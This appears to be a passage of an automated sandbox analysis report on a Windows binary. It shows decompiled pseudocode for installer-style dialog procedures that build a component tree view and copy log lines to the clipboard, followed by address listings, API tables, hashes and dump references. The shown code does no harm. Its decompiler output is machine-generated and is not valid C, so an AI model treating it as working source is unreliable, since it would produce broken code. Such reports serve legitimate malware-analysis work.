				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x42ec48; // 0x79f004
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x42ec30; // 0x79ee58
				_t315 = 0;
				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x42ec39 & 0x00000002;
							if(( *0x42ec39 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404782(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x42ec38; // 0x80
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x42a07c;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x42a094;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x42a07c = _t315;
									 *0x42a094 = _t315;
									 *0x42ec80 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x42ec39 & 0x00000001;
										if(( *0x42ec39 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x42ec4c - _t315; // 0x1
										_v32 =  *0x42a094;
										_t196 =  *0x42ec48; // 0x79f004
										_v60 = 0xf030;
										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x42e3fc; // 0x7a3d7a
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E0040473D(0x3ff, 0xfffffffb, E00404755(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x79f00c
											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x79f01c
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x42ec4c; // 0x1
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x42a094);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x42ec80 = _a4;
					_t247 =  *0x42ec4c; // 0x1
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42a094 = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x42ec20, 0x6e);
					 *0x42a088 =  *0x42a088 | 0xffffffff;
					_v24 = _t250;
					 *0x42a090 = SetWindowLongA(_v8, 0xfffffffc, E00404E03);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42a07c = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x42a07c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405BE9(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E83(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E83(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x42ec4c - _t318; // 0x1
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42a094 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42a094 + _t318 * 4) = _t274;
									_t288 =  *( *0x42a094 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x42ec4c; // 0x1
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403EB8(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403EB8(_v12);
								L89:
								return E00403EEA(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}






































































                                                  0x00404820
                                                  0x00404826
                                                  0x00404828
                                                  0x0040482e
                                                  0x00404834
                                                  0x00404837
                                                  0x00404841
                                                  0x0040484a
                                                  0x0040484d
                                                  0x00404850
                                                  0x00404a78
                                                  0x00404a78
                                                  0x00404a7f
                                                  0x00404a93
                                                  0x00404a81
                                                  0x00404a83
                                                  0x00404a86
                                                  0x00404a87
                                                  0x00404a8e
                                                  0x00404a8e
                                                  0x00404a96
                                                  0x00404a9f
                                                  0x00404aaa
                                                  0x00404aaa
                                                  0x00404aad
                                                  0x00404ab0
                                                  0x00404abf
                                                  0x00404abf
                                                  0x00404ac6
                                                  0x00404b3e
                                                  0x00404b3e
                                                  0x00404b41
                                                  0x00404b43
                                                  0x00404b46
                                                  0x00404b4d
                                                  0x00404b5b
                                                  0x00404b5b
                                                  0x00404b5d
                                                  0x00404b60
                                                  0x00404b67
                                                  0x00404b69
                                                  0x00404b6d
                                                  0x00404b8a
                                                  0x00404b8e
                                                  0x00404b8e
                                                  0x00404b6f
                                                  0x00404b7c
                                                  0x00404b7c
                                                  0x00404b6d
                                                  0x00404b67
                                                  0x00000000
                                                  0x00404b41
                                                  0x00404ac8
                                                  0x00404acb
                                                  0x00404ad6
                                                  0x00404ad8
                                                  0x00404adb
                                                  0x00404ae2
                                                  0x00404ae7
                                                  0x00404ae9
                                                  0x00404af3
                                                  0x00404af3
                                                  0x00404af7
                                                  0x00404af9
                                                  0x00404afc
                                                  0x00404afe
                                                  0x00404b01
                                                  0x00404b17
                                                  0x00404b17
                                                  0x00404b03
                                                  0x00404b03
                                                  0x00404b09
                                                  0x00404b0b
                                                  0x00404b12
                                                  0x00404b0d
                                                  0x00404b0d
                                                  0x00404b0d
                                                  0x00404b0b
                                                  0x00404b1b
                                                  0x00404b1d
                                                  0x00404b22
                                                  0x00404b2b
                                                  0x00404b2c
                                                  0x00404b36
                                                  0x00404b36
                                                  0x00404b38
                                                  0x00404b3b
                                                  0x00404b3b
                                                  0x00404afc
                                                  0x00000000
                                                  0x00404ae9
                                                  0x00404acd
                                                  0x00404ad0
                                                  0x00404ad4
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404ad4
                                                  0x00404ab2
                                                  0x00404ab9
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404aa1
                                                  0x00404aa1
                                                  0x00404aa4
                                                  0x00404b91
                                                  0x00404b91
                                                  0x00404b98
                                                  0x00404c0c
                                                  0x00404c0c
                                                  0x00404c13
                                                  0x00404c1f
                                                  0x00404c1f
                                                  0x00404c21
                                                  0x00404c28
                                                  0x00404c2a
                                                  0x00404c2f
                                                  0x00404c31
                                                  0x00404c34
                                                  0x00404c34
                                                  0x00404c3a
                                                  0x00404c3f
                                                  0x00404c41
                                                  0x00404c44
                                                  0x00404c44
                                                  0x00404c4a
                                                  0x00404c50
                                                  0x00404c56
                                                  0x00404c56
                                                  0x00404c5c
                                                  0x00404c63
                                                  0x00404db0
                                                  0x00404db0
                                                  0x00404db7
                                                  0x00404db9
                                                  0x00404dc0
                                                  0x00404dc4
                                                  0x00404dd1
                                                  0x00404dd1
                                                  0x00404dd4
                                                  0x00404dda
                                                  0x00404dec
                                                  0x00404dec
                                                  0x00404dc0
                                                  0x00000000
                                                  0x00404c69
                                                  0x00404c6b
                                                  0x00404c70
                                                  0x00404c73
                                                  0x00404c77
                                                  0x00404c77
                                                  0x00404c7c
                                                  0x00404c7f
                                                  0x00404cc0
                                                  0x00404cc2
                                                  0x00404ccc
                                                  0x00404cd2
                                                  0x00404cd5
                                                  0x00404cda
                                                  0x00404ce1
                                                  0x00404ce4
                                                  0x00404d86
                                                  0x00404d8c
                                                  0x00404d92
                                                  0x00404d97
                                                  0x00404d9a
                                                  0x00404dab
                                                  0x00404dab
                                                  0x00000000
                                                  0x00404cea
                                                  0x00404cea
                                                  0x00404cea
                                                  0x00404ced
                                                  0x00404cf3
                                                  0x00404cf6
                                                  0x00404cf8
                                                  0x00404cfa
                                                  0x00404cfc
                                                  0x00404cff
                                                  0x00404d02
                                                  0x00404d09
                                                  0x00404d0b
                                                  0x00404d0e
                                                  0x00404d15
                                                  0x00404d18
                                                  0x00404d18
                                                  0x00404d18
                                                  0x00404d18
                                                  0x00404d1c
                                                  0x00404d1f
                                                  0x00404d2b
                                                  0x00404d2c
                                                  0x00404d2f
                                                  0x00404d31
                                                  0x00404d31
                                                  0x00404d31
                                                  0x00404d21
                                                  0x00404d23
                                                  0x00404d23
                                                  0x00404d50
                                                  0x00404d50
                                                  0x00404d51
                                                  0x00404d5d
                                                  0x00404d6c
                                                  0x00404d6c
                                                  0x00404d6e
                                                  0x00404d71
                                                  0x00404d7a
                                                  0x00404d7a
                                                  0x00000000
                                                  0x00404ced
                                                  0x00404c81
                                                  0x00404c8c
                                                  0x00404c8f
                                                  0x00404c94
                                                  0x00404c96
                                                  0x00404c98
                                                  0x00404c9a
                                                  0x00404caa
                                                  0x00404cb4
                                                  0x00404cb6
                                                  0x00404cb9
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404c9c
                                                  0x00404c9c
                                                  0x00404c9c
                                                  0x00404c9f
                                                  0x00404ca2
                                                  0x00404ca4
                                                  0x00404ca4
                                                  0x00404ca4
                                                  0x00404ca5
                                                  0x00404ca6
                                                  0x00404ca6
                                                  0x00000000
                                                  0x00404c9c
                                                  0x00404c7f
                                                  0x00404c63
                                                  0x00404b9a
                                                  0x00404ba0
                                                  0x00000000
                                                  0x00000000
                                                  0x00404bac
                                                  0x00404bb0
                                                  0x00000000
                                                  0x00000000
                                                  0x00404bc0
                                                  0x00404bc2
                                                  0x00404bc5
                                                  0x00000000
                                                  0x00000000
                                                  0x00404bd7
                                                  0x00404bd9
                                                  0x00404bdc
                                                  0x00404be6
                                                  0x00404be8
                                                  0x00404be9
                                                  0x00404bea
                                                  0x00404bf9
                                                  0x00404bfb
                                                  0x00404c02
                                                  0x00404c05
                                                  0x00000000
                                                  0x00404c05
                                                  0x00404bde
                                                  0x00404be1
                                                  0x00404be4
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404be4
                                                  0x00000000
                                                  0x00404aa4
                                                  0x00404856
                                                  0x0040485b
                                                  0x00404860
                                                  0x00404865
                                                  0x00404866
                                                  0x0040486f
                                                  0x0040487a
                                                  0x00404885
                                                  0x0040488b
                                                  0x00404899
                                                  0x004048ae
                                                  0x004048b3
                                                  0x004048be
                                                  0x004048c7
                                                  0x004048dc
                                                  0x004048ed
                                                  0x004048fa
                                                  0x004048fa
                                                  0x004048ff
                                                  0x00404905
                                                  0x00404907
                                                  0x0040490a
                                                  0x0040490f
                                                  0x00404914
                                                  0x00404916
                                                  0x00404916
                                                  0x00404936
                                                  0x00404936
                                                  0x00404938
                                                  0x00404939
                                                  0x0040493e
                                                  0x00404941
                                                  0x00404944
                                                  0x00404948
                                                  0x0040494d
                                                  0x00404952
                                                  0x00404956
                                                  0x0040495b
                                                  0x00404960
                                                  0x00404962
                                                  0x00404964
                                                  0x0040496a
                                                  0x00404a34
                                                  0x00404a47
                                                  0x00000000
                                                  0x00404970
                                                  0x00404973
                                                  0x00404976
                                                  0x00404979
                                                  0x00404979
                                                  0x0040497f
                                                  0x00404985
                                                  0x00404988
                                                  0x0040498e
                                                  0x0040498f
                                                  0x00404994
                                                  0x0040499d
                                                  0x004049a4
                                                  0x004049a7
                                                  0x004049aa
                                                  0x004049ad
                                                  0x004049e7
                                                  0x004049e9
                                                  0x00404a12
                                                  0x004049eb
                                                  0x004049f8
                                                  0x004049f8
                                                  0x004049af
                                                  0x004049b2
                                                  0x004049c1
                                                  0x004049cb
                                                  0x004049d3
                                                  0x004049da
                                                  0x004049e2
                                                  0x004049e2
                                                  0x004049ad
                                                  0x00404a18
                                                  0x00404a19
                                                  0x00404a1f
                                                  0x00404a25
                                                  0x00404a25
                                                  0x00404a32
                                                  0x00404a4d
                                                  0x00404a51
                                                  0x00404a6e
                                                  0x00404a73
                                                  0x00404a76
                                                  0x00404a76
                                                  0x00000000
                                                  0x00404a53
                                                  0x00404a58
                                                  0x00404a61
                                                  0x00404dee
                                                  0x00404e00
                                                  0x00404e00
                                                  0x00404a51
                                                  0x00000000
                                                  0x00404a32
                                                  0x0040496a

                                                  APIs
                                                  • GetDlgItem.USER32 ref: 00404819
                                                  • GetDlgItem.USER32 ref: 00404826
                                                  • GlobalAlloc.KERNEL32(00000040,00000001), ref: 00404872
                                                  • LoadBitmapA.USER32 ref: 00404885
                                                  • SetWindowLongA.USER32 ref: 0040489F
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004048B3
                                                  • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004048C7
                                                  • SendMessageA.USER32(?,00001109,00000002), ref: 004048DC
                                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048E8
                                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048FA
                                                  • DeleteObject.GDI32(?), ref: 004048FF
                                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040492A
                                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404936
                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049CB
                                                  • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004049F6
                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A0A
                                                  • GetWindowLongA.USER32 ref: 00404A39
                                                  • SetWindowLongA.USER32 ref: 00404A47
                                                  • ShowWindow.USER32(?,00000005), ref: 00404A58
                                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B5B
                                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404BC0
                                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BD5
                                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BF9
                                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C1F
                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404C34
                                                  • GlobalFree.KERNEL32 ref: 00404C44
                                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404CB4
                                                  • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404D5D
                                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D6C
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404D8C
                                                  • ShowWindow.USER32(?,00000000), ref: 00404DDA
                                                  • GetDlgItem.USER32 ref: 00404DE5
                                                  • ShowWindow.USER32(00000000), ref: 00404DEC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N$Xy$z=z
                                                  • API String ID: 1638840714-320808487
                                                  • Opcode ID: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
                                                  • Instruction ID: 6f0a98d5dd10ef4145f29f69d97320cca22844812bd755e22afdd9aff1593a00
                                                  • Opcode Fuzzy Hash: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
                                                  • Instruction Fuzzy Hash: A702B1B0A00209EFEB25CF95DD45AAE7BB5FB84314F10413AF610BA2E1C7799A41CF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404FF1, Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 278windowclipboardmemoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 96%
                                                  			E00404FF1(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x42e404; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404F85, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E00405BE9(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x42a0a0;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42e3ec - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42ec28, 8);
							__eflags =  *0x42ecac - _t149; // 0x0
							if(__eflags == 0) {
								E00404EB3( *((intOrPtr*)( *0x429870 + 0x34)), _t149);
							}
							E00403E5C(1);
							goto L25;
						}
						 *0x429468 = 2;
						E00403E5C(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403EEA(_a8, _a12, _a16);
						}
						ShowWindow( *0x42e3f0, _t149);
						ShowWindow(_t154, 8);
						E00403EB8(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x42ec30; // 0x79ee58
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x42e3f0 = GetDlgItem(_a4, 0x403);
				 *0x42e3e8 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x42e404 = _t127;
				_v8 = _t127;
				E00403EB8( *0x42e3f0);
				 *0x42e3f4 = E00404755(4);
				 *0x42e40c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E83(_a4);
				if(( *0x42ec38 & 0x00000003) != 0) {
					ShowWindow( *0x42e3f0, _t149);
					if(( *0x42ec38 & 0x00000002) != 0) {
						 *0x42e3f0 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403EB8( *0x42e3e8);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x42ec38 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}


































                                                  0x00404ffa
                                                  0x00405000
                                                  0x00405009
                                                  0x0040500c
                                                  0x0040519d
                                                  0x004051a4
                                                  0x004051c8
                                                  0x004051c8
                                                  0x004051ce
                                                  0x004051db
                                                  0x004051f9
                                                  0x004051f9
                                                  0x00405200
                                                  0x00405257
                                                  0x00405257
                                                  0x0040525b
                                                  0x00000000
                                                  0x00000000
